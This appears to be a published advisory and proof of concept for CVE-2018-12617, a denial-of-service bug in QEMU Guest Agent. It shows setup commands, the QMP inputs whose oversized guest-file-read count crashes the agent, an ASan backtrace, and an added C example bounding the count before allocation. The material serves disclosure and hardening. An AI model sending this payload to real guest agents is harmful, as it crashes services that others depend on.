Created June 21, 2018 17:07
# Exploit Title: QEMU Guest Agent Denial of Service
# Date: 2018-06-07
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage:
# Software Link:
# Version: 2.12.50 and earlier
# Tested on: 2.12.50
# CVE : CVE-2018-12617
QEMU Guest Agent 2.12.50 and earlier has an integer overflow that causes a g_malloc0() call to trigger a segmentation fault when it tries to allocate a large memory chunk. The vulnerability can be exploited by sending a specific QMP command to the agent over its listening socket.
First, start the guest agent with the following command:
$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp
Second, from another console, connect to the UNIX socket using socat:
$ socat unix-connect:/tmp/qga.sock -
Third, enter the following QMP commands; the line between them is the agent's reply:
{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+"}}
{"return": 1000}
{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}
The guest-file-read command must be given the correct handle value (the file descriptor returned by guest-file-open); different files will have different handle values.
ASan backtrace at the crash:
#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/
#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/
#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/
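To show where the defensive check belongs, here is an added C example (not QEMU's code; the handler shape, the function names and the 48 MiB cap are assumptions) that models the guest-file-read count handling described above: the unchecked version forwards any non-negative count straight to the allocator, while the hardened version bounds it before allocating and reads through that bound.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed values: the default borrows QEMU's QGA_READ_COUNT_DEFAULT name;
 * the cap is an assumed policy limit for this example, not QEMU's. */
#define READ_COUNT_DEFAULT 4096
#define READ_COUNT_MAX     (48 * 1024 * 1024)

/* Size the unchecked handler hands to g_malloc0(): count + 1 for a trailing
 * NUL. Only negative counts are rejected, so the PoC's count=4294967295
 * turns into a 4 GiB zeroed allocation. Returns 0 when rejected. */
uint64_t vulnerable_alloc_size(bool has_count, int64_t count)
{
    if (!has_count) count = READ_COUNT_DEFAULT;
    if (count < 0) return 0;
    return (uint64_t)count + 1;
}

/* Hardened variant: bound count to [0, READ_COUNT_MAX] before it can reach
 * the allocator, so the client cannot choose an arbitrary buffer size. */
uint64_t hardened_alloc_size(bool has_count, int64_t count)
{
    if (!has_count) count = READ_COUNT_DEFAULT;
    if (count < 0 || count > READ_COUNT_MAX) return 0;
    return (uint64_t)count + 1;
}

/* Bounded read: allocate only after validation, then read at most count
 * bytes from fh into a NUL-terminated buffer. Returns NULL on a rejected
 * count or allocation failure; *out_len receives the bytes actually read. */
char *guest_file_read_bounded(FILE *fh, bool has_count, int64_t count,
                              size_t *out_len)
{
    uint64_t sz = hardened_alloc_size(has_count, count);
    if (sz == 0) return NULL;
    char *buf = calloc(1, (size_t)sz); /* stands in for g_malloc0() */
    if (buf == NULL) return NULL;
    *out_len = fread(buf, 1, (size_t)(sz - 1), fh);
    return buf;
}
```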